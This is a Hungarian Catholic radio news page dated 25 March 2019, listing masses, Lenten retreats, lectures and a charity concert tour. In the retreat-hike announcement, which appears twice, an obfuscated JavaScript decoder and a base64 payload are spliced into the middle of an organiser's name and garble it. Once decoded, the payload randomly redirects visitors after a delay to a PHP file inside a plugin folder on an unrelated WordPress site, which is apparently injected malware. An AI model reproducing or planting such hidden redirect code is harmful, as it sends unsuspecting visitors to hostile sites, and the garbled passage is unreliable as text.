2019. március 25. – Hírek és programajánló

H Í R E K   D É L B E N

Gyümölcsoltó Boldogasszony-napi búcsúk
Árkoson, az Irgalmasság Anyja kismamaotthon búcsúünnepén ma délután 4 órakor kezdődik a szentmise. A szentbeszédet Brassóból Puvak Marian OFM tartja.
Az erdélyi Mária Rádió nagyváradi stúdió-kápolnájának titulusa Gyümölcsoltó Boldogasszony. A szentmise, amelyet élő adásban közvetítünk, ma délután 3 órakor kezdődik. Főcelebránsa és szónoka Fodor József nagyváradi általános helynök.

Koncertkörút a jótékonyság jegyében
Böjte Csaba ferences atya és a Nem adom fel együttes jótékonysági koncertkörútra indulnak március 25-28 között, melynek keretében Csaba testvér elmélkedéseit és a sérült fiatalokból álló együttes koncertjét hallgathatják meg.  Ma délután hat órától Székelyudvarhelyen a Rákóczi centerben, holnap, március 26.-án Gyergyószentmiklóson a Szent István plébánián este hét órától, március 27-én Csíkszeredában  a Csíki moziban délután hat órától és végül március 28-án Máréfalván a kultúrotthonban este hét órától hallgathatják meg őket. A koncertek teljes bevételét a Csíkszeredában épülő Összefogás Háza Rehabilitációs Integrációs központnak ajánlják fel. Szeretettel várnak mindenkit a koncertekre.

Előadás Kolozsváron
Március 26-án, holnap délután öt órától Kolozsváron a nőszövetség dísztermében dr. Vik János, a BBTE Római Katolikus Teológia Karának dékánja tart előadást „Miért olyan pápa Ferenc, amilyen? Válaszkeresés a Szent Ignác-i lelkiség és a nép teológiája tükrében” címmel. Szeretettel várnak minden érdeklődőt.

Triduum Petrozsényben
Március 27-29. között a petrozsényi egyházközségben nagyböjti triduumot tartanak a délután 5 órakor kezdődő szentmiséken. A lelkigyakorlatos szentmiséken Varga Rezső kézdikővári plébános prédikál.

Nagyböjti triduum Székelyudvarhelyen
Nagyböjti triduum lesz a Székelyudvarhely-szombatfalvi egyházközségben is március 27-29. között. Az elmélkedéseket Puskás Attila nyárádselyei pléábnos tartja a Szent György-plébániatemplomban, a délután 5 órakor kezdődő szentmisék keretén belül.

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, március 29-én, pénteken délután 6 órakor Sebestyén Péter plébános, Sarkalatos erények címmel tart előadást a csíkszeredai városháza gyűléstermében Minden érdeklődőt várnak.

Nagyböjti lelkinapok Oroszhegyen
Az oroszhegyi plébániatemplomban március 29-31. között nagyböjti lelkigyakorlatot tart Tamás Barna SJ Marosvásárhelyről. Pénteken és szombaton a szentmisék délután 5 órakor kezdődnek, vasárnap pedig reggel 9 és délelőtt 11 órakor.

Nők nagyböjti lelkinapja Sepsiszentgyörgyön
Március 30-án délután 3 órától Sepsiszentgyörgyön a nők részére nagyböjti lelkinapot tartanak a Szent József-plébániatemplomban. Hívják és várják a nőket a város egész területéről.

Elváltak lelki hétvégéje
A Gyulafehérvári Főegyházmegye Családpasztorációs Központja április 12-e és 13-aközött szervezi meg az elváltak lelki hétvégéjét a csíkszentdomokosi SzentMargit Lelkigyakorlatos Házban. A lelkitalálkozó mottója: „Kelj fel és járj!” (Lk. 5,23) A program pénteken 18 órakor kezdődik és szombaton 19 órakor ér véget. A hétvége részvételi díja: 25lej/fő/hétvége. Ez az összeg nem tartalmazza a szállás, illetve az étkezésköltségeit. A teljes ellátást igénylők számára az összköltség 90 lej. Jelentkezni április 8-ig lehet a www.csalad.ro  oldalon.

Lelkigyakorlatos túra
Július 13-19 között Both Vfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');anda és Vormair Emese kíséretével lelkigyakorlatos túrát szerveznek az Ausztriai Tragössbe. Teljes csendben, a természet szépségében, Isten jelenlétében, testünk és lelkünk lehetőségeivel és határaival túrázva, életünkkel imádkozva- ez a túra célkitűzése. Szállás 2-4 fős lakásokban lesz, a túrák közepes, néha nehéz jellegűek. Jelentkezni és érdeklődni március 30.-ig lehet a vormairemese@gmail. com e-mail címen.

Imalánc papokért és szerzetesekért
A gyulafehérvári egyházmegyében a hivatás évében arra hívják meg a híveket, hogy imáikkal támogassák azokat, akik a papi és szerzetesi hivatást vállalták. Szükségük van az imára, hogy hivatásukban megerősödjenek és kitartsanak. Ennek érdekében arra kérik a kedves híveket, hogy vállaljanak imát egy-egy papért vagy szerzetesért, bekapcsolódva ebbe a közös imahálóba. Az imát vállaló személy egy pap vagy szerzetes keresztnevét fogja megkapni, akiért naponta elvégez egy Miatyánkot és egy rövid fohászt. Jelentkezni lehet a plébániákon.

Időjárás: Egy hidegfront érkezik, ennek következtében feltámad a szél. A rövid napos időszakok mellett, több helyen esőre, futó záporokra kell számítani. Sokfelé 6-13 fokig esik vissza a csúcshőmérséklet, de délen még 10-15 fokot mérhetünk.

MRE - Hírszolgálat, 2019. március 25.


H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a szentkeresztbányai templomban, a szatmári egyházmegyében pedig a túrterebesi templomban tartják az örökös szentségimádási napot. Nagyböjt folyamán járuljunk gyakrabban az Oltáriszentségben jelen levő Krisztus elé, engeszteljük Őt bűneinkért és engedjük, hogy jelenléte formáljon, megtisztítson bennünket.

Gyümölcsoltó Boldogasszony-napi búcsúk
A gyulafehérvári Hittudományi Főiskola és Papnevelő Intézet kápolnájának búcsúján az ünnepi szentmisét ma reggel 9 órától tartják. A szentbeszédet Pál József-Csaba temesvári megyés püspök tartja. A szentmisét követően a szemináriumot fenntartó püspökök a tanintézet elöljáróival és a tantestülettel közös megbeszélésen vesznek részt.
Árkoson, az Irgalmasság Anyja kismamaotthon búcsúünnepén ma délután 4 órakor kezdődik a szentmise. A szentbeszédet Brassóból Puvak Marian OFM tartja.
Az erdélyi Mária Rádió nagyváradi stúdió-kápolnájának titulusa Gyümölcsoltó Boldogasszony. A szentmise, amelyet élő adásban közvetítünk, ma délután 3 órakor kezdődik. Főcelebránsa és szónoka Fodor József nagyváradi általános helynök.

Mária Légiósok fogadalomújítása Csíksomlyón
A  Csíksomlyói Szűzanya Curiához tartozó légiósok ma, Gyümölcsoltó Boldogasszony ünnepén, a csíkszeredai Millenniumi templomban a 10 órás szentmise keretében  megújítják fogadalmukat a Szűzanyának, és egyben erőt és áldást kérnek Tőle egy újabb évre munkájukhoz. Szeretettel várnak minden légióst.

Előadás Márton Áronról Marosvásárhelyen
Ma délelőtt tíz órától Nagy Zoltán székelyudvarhelyi tanár Isten szolgája Márton Áron püspökké szentelésének 80. évében Erdély szentéletű püspökéről tart képekkel, eredeti hangfelvételekkel, film- részletekkel gazdagított előadást a marosvásárhelyi II. Rákóczi Ferenc Katolikus Gimnáziumban. Egyben bemutatja a kolozsvári Verbum Kiadónál megjelent A Hegy című, háromlemezes DVD-összeállítást a püspök életéről és az Imádkozzunk Áron püspökkel! című imafüzetet. Várnak minden érdeklődőt.

Koncertkörút a jótékonyság jegyében
Böjte Csaba ferences atya és a Nem adom fel együttes jótékonysági koncertkörútra indulnak március 25-28 között, melynek keretében Csaba testvér elmélkedéseit és a sérült fiatalokból álló együttes koncertjét hallgathatják meg.  Ma délután hat órától Székelyudvarhelyen a Rákóczi centerben, holnap, március 26-án Gyergyószentmiklóson, a Szent István plébánián este hét órától, március 27-én Csíkszeredában  a Csíki moziban délután hat órától és végül március 28-án Máréfalván a kultúrotthonban este hét órától hallgathatják meg őket. A koncertek teljes bevételét az épülő Összefogás Háza Rehabilitációs központnak ajánlják fel. Szeretettel várnak mindenkit a koncertekre.

Előadás Kolozsváron
Március 26-án, kedden délután öt órától Kolozsváron a nőszövetség dísztermében dr. Vik János, a BBTE Római Katolikus Teológia Karának dékánja tart előadást „Miért olyan pápa Ferenc, amilyen? Válaszkeresés a Szent Ignác-i lelkiség és a nép teológiája tükrében” címmel. Szeretettel várnak minden érdeklődőt.

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadássorozat keretében, március 29-én, pénteken este 18. órakor Sebestyén Péter plébános: SARKALATOS ERÉNYEK  címmel tart előadást a csíkszeredai városháza gyűléstermében Minden érdeklődőt várnak.

Elváltak lelki hétvégéje
A Gyulafehérvári Főegyházmegye Családpasztorációs Központja április 12-e és 13-aközött szervezi meg az elváltak lelki hétvégéjét a csíkszentdomokosi SzentMargit Lelkigyakorlatos Házban. A lelkitalálkozó mottója az idén: „Kelj fel és járj!” (Lk. 5,23) Mindannyiunk életében vannak olyan érzelmi, kapcsolati vagy másfajta „bénultságok”, amelyekkel talán régóta küszködünk, amelyek mélyen és hosszan- tartóan belénk ivódtak. Ezek életünk nem működő részei, amelyek hozzánk tartoznak, és amelyek fejlődésünkben, továbblépésünkben gátolnak. Ezen a hétvégén ezekre akarunk szeretettel rátekinteni, elakadásainkkal szeretnénk foglalkozni annak tudatában, hogy Jézus bénaságainkkal együtt magához emel, szeret minket. Ő az, aki ki tud és ki akar vezetni minket ezekből a zsákutcákból, tőle gyógyulást, szabadulást kaphatunk.
A program pénteken 18 órakor kezdődik és szombaton 19 órakor ér véget. A hétvége részvételi díja: 25lej/fő/hétvége. Ez az összeg nem tartalmazza a szállás, illetve az étkezésköltségeit. A teljes ellátást igénylők számára az összköltség 90 lej. Jelentkezni április 8-ig lehet a www.csalad.ro  oldalon.

Lelkigyakorlatos túra
Július 13-19 között Both Vfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');anda és Vormair Emese kíséretével lelkigyakorlatos túrát szerveznek az Ausztriai Tragössbe. Teljes csendben, a természet szépségében, Isten jelenlétében, testünk és lelkünk lehetőségeivel és határaival túrázva, életünkkel imádkozva- ez a túra célkitűzése. Szállás 2-4 fős lakásokban lesz, a túrák közepes, néha nehéz jellegűek. Jelentkezni és érdeklődni március 30.-ig lehet a vormairemese@gmail. com e-mail címen.

Időjárás: Egy hidegfront érkezik, ennek következtében feltámad a szél. A rövid napos időszakok mellett, több helyen esőre, futó záporokra kell számítani. Sokfelé 6-13 fokig esik vissza a csúcshőmérséklet, de délen még 10-15 fokot mérhetünk.

MRE - Hírszolgálat, 2019. március 25.

About the author

maradmin

Leave a Comment